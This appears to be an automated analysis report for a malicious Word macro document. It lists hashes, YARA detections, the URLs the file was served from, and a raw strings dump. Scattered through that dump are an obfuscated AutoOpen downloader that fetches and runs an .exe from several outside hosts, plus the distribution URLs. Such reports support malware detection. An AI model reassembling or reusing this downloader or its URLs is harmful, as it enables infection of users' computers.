Sample details: c061fde9f43420094d3e9cff5f4c8493 --

Hashes
MD5: c061fde9f43420094d3e9cff5f4c8493
SHA1: 75f4e6d803e6c99424f1d3d89e6942603713f817
SHA256: fcc788fd4434547e83fdf430b5ecad0ce426033ee4dc29c2232d02c138c50482
SSDEEP: 768:dpJcaUitGAlmrJpmxlzC+w99NBD+1ol60CC6mot0fXa6LJXBgaI:dptJlmrJpmxlRw99NBD+alTCR6L5Bg
Details
File Type: Composite
Yara Hits
YRP/office_document_vba | YRP/Office_AutoOpen_Macro | YRP/Contains_VBA_macro_code | YRP/domain | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Big_Numbers0 | FlorianRoth/Office_AutoOpen_Macro |
Source
http://dahampa.com/Sep2018/EN_en/Invoices-attached/
http://dahampa.com/Sep2018/EN_en/Invoices-attached
Strings
		uZHHMipWKbjFBAwatNt  
a$	gdP0
UNICODE
 Compressed by jpeg-recompress
&""&0-0>>T
&""&0-0>>T
mdK%?<y
 "$0234p
rkitNP
yNkl[o
|"J$fb|
Z|&1Vk.
C,*uXt
Q,CT!'
)un$oW
#3BRSb
!AmZ]&54
d.:zM1
?tc&<i
 zM7&v
p[<fu$H 
>uiq[m
yM\lb"
XKZF	:
y8xB6/
k(kEyw
!1AQaq
+LU>j/
:zPpr8aB
nUBa+W
Fita@\K
YU}MR.]8Zh
MH8GZb
b@q$Jo
Qrrz2_
N7DYha
j.dqd5
sE>,8?0
$`35QTt
`NuGWp
a	)M6V
r%%8Qv
jSK7eH+-
 "$1@0236`t
KsOuw,
c&fP"?r
c&fP""
8Xs9b\
2%Ufbl
fV"g15
#03`bqr
`dj)X0
#&%"y:
hY?ZWP
R`H$E[!
[Content_Types].phj
_WGAD/.WGAD
inEhh/inEhh/inEhhManager.phj
inEhh/inEhh/inEhh1.phj
$4vq^W
MB[F7x"
>Yr]H+
a!e9#i
An7jah
inEhh/inEhh/_WGAD/inEhhManager.phj.WGAD
K(M&$R(.1
[Content_Types].phjPK
_WGAD/.WGADPK
inEhh/inEhh/inEhhManager.phjPK
inEhh/inEhh/inEhh1.phjPK
inEhh/inEhh/_WGAD/inEhhManager.phj.WGADPK
FddzE version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
Normal.dotm
Microsoft Office Word
Mackenzie
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\system3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
!G{2DF
8D04C-5B
FA-101B-
m Files\@Common
icrosoft
 Shared\
OFFICE16
\MSO.DLL
M 16.0
EwiAcaJr
zniJjjRV
*\CNormalrU
ThisDocument
Project
EwiAcaJrEiEa
Module1
FzniJjjRVH
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB
C:\Windows\system32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
Document
AutoOpen
md /V:/
^s^et l
^e=  ^   ^  ^ ^ 
        ^}}
^};^k^a^er^
ia^$^ me^tI^-ek
^ovn^I^;)
^ ,^j^p^X$(^el
iF^d^a^o^lnw^o^D.^w^u^I${^y
rt^{)ZXn$ ni^ ^j^pX$
^a^er^of^;'^
e^xe.'^+^O^U^I$+^'^\^'+
i^lbup:vne$^=
;^'093'^ ^= O^UI$^
;)'@'(tilp^S^.'J2b6^B/^tn^etn
^-^pw/r^
^.^y^ar^t^i//^:p
^tth@A^
57^Bj/ur.
i^go^lk^ta
//^:^pt^th@l
^0^k5/^s^d
a^o^l^pu/tne^tno
-pw/ra^.
u^d^e^.pl^u.sa^moi^
d^ie^do
tut^itsn^i//^:^p^t^
th@4p2u^Z01/^m^o
.^ov^it^isopro^lav//:^ptt
^h^@j^A^
M^2U/^ur^.ely^
t^snusbd//^:ptth'^=^Z^Xn$^;^t
beW.^teN^ t
^jbo-^wen=^w^u^I^$^
 ^l^l^eh^sr^ewo^p&&^f^o
r /^L %^W ^in (
^396^;-^
1;^0)d^o ^s^e^t ^M
G^U=!^MG^U!!l^e:~%^W,1!&&^i^f
 %^W e^q^u ^0 
l %^MG^U:^*^M^G
^U!^=%
Attribut
e VB_Nam
e = "Fzn
iJjjRVH"
Functi
on LTuzu
Dim irbn
/`QvZWJ
?7278056
T	SAzH
230015
751979
fXtD|sl
625617
ijuHBFaL
Format
(Chr(5 +
 /V:/"
^s^et 
"^e=  
;^k^a^er
"ia^$^ m
e^tI^-ek
MvTTnGq
517402`771
uXRIvj
385908087 $
9888986
c@rFqkiY
^ovn^I^;
,^j^p^X$
Mo^lnw^o
^D.^w^u^ I${^yB
^{)ZXn$ Lni
Xof^;'
Ye^xe.'^ +^O^U@
'^\^'+
p:vne$^=CL
;@^'093'@
(tilp^S^
.'J2b6^BP/^tn
}-^pw/
E1678835
bF39aQ$
SzUhDio
azMpaEk^.
4.^y^ar
i//^:p
@^tth@Ac&A
,57^Bj/Xur.
"i^g`Qk^
3E541468
?nWPYh
x732PV
pWf@pdNuIl
Q0P^k5/
PMl^pu/tn]0qn
^","u@Re^.
pl^u.sa^
"tut^`itsn^
+4p2u^Z
01/^m^
pr01av//:
9M^2U/^
ur^.elyT
^snusbd
0<'^=^Z^p\
567419
UKQ|vM
7B6CcZX@XktaIj
eW.^teN^& b!
$jbo-^we
eh^sr^e
wo^p&&^f
S+"r /^L 
%^W ^in 
396^;-
S'1;^0)d^
G^U=!^M
!!l^e:~
e^q^u x^0 !
ud+ 7G+ 
wDszIX7
Attribut
e VB_Nam
e = "Ewi
AcaJrEiE
1Normal
.ThisDoc ument
lFalse
Creatabl
Predecl
BExpose
Template Deriv
stomiz
Sub Auto
Open()
  Dim SX
+nfbmc
*2936p7540
hYjPiG
1976H)jW
834684
5521041:1
pzhPSF
41493389
hell@ LT
uzuiQ + 
KZbIqrsc
zrRwnOzb kp, F
]JcYth
Win64x
Project1
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
Documentj
EwiAcaJrEiEa
AutoOpen
SXpODST
nfbmchb
hYjPiR
jWQjSf
pzhPSF
ShellV
LTuzuiQq
KZbIqrscsDqRV
nqLzrRwnOzbkp
SJcYtF
Module1b
FzniJjjRVH
irbnC.
AzHhch
OBijuHBFaLa
TtCpY4
OjdDAP
rFqkiY
tZnGwA*r
zUhDioazMp
hjSSnC
pWfpdNuIl
jwJMh[
UKQvML#
tiPpu2j
CcZXXktaIj
cpBujiPB
wDszIX
ID="{C476A517-FA84-48C2-B136-FA3284D9A6F8}"
Document=EwiAcaJrEiEa/&H00000000
Module=FzniJjjRVH
ExeName32="rkPvaoGLQCSNzm"
me="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="1210FAEA08EE08EE08EE08EE"
DPB="2426CC1CCC2FCD2FCD2F"
GC="3634DE0EE232F533F5330A"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
EwiAcaJrEiEa=0, 0, 0, 0, C
FzniJjjRVH=25, 25, 1385, 693, 
EwiAcaJrEiEa
FzniJjjRVH
Microsoft Word 97-2003 Document
MSWordDoc
Word.Document.8
Normal.dotm
Microsoft Office Word
Mackenzie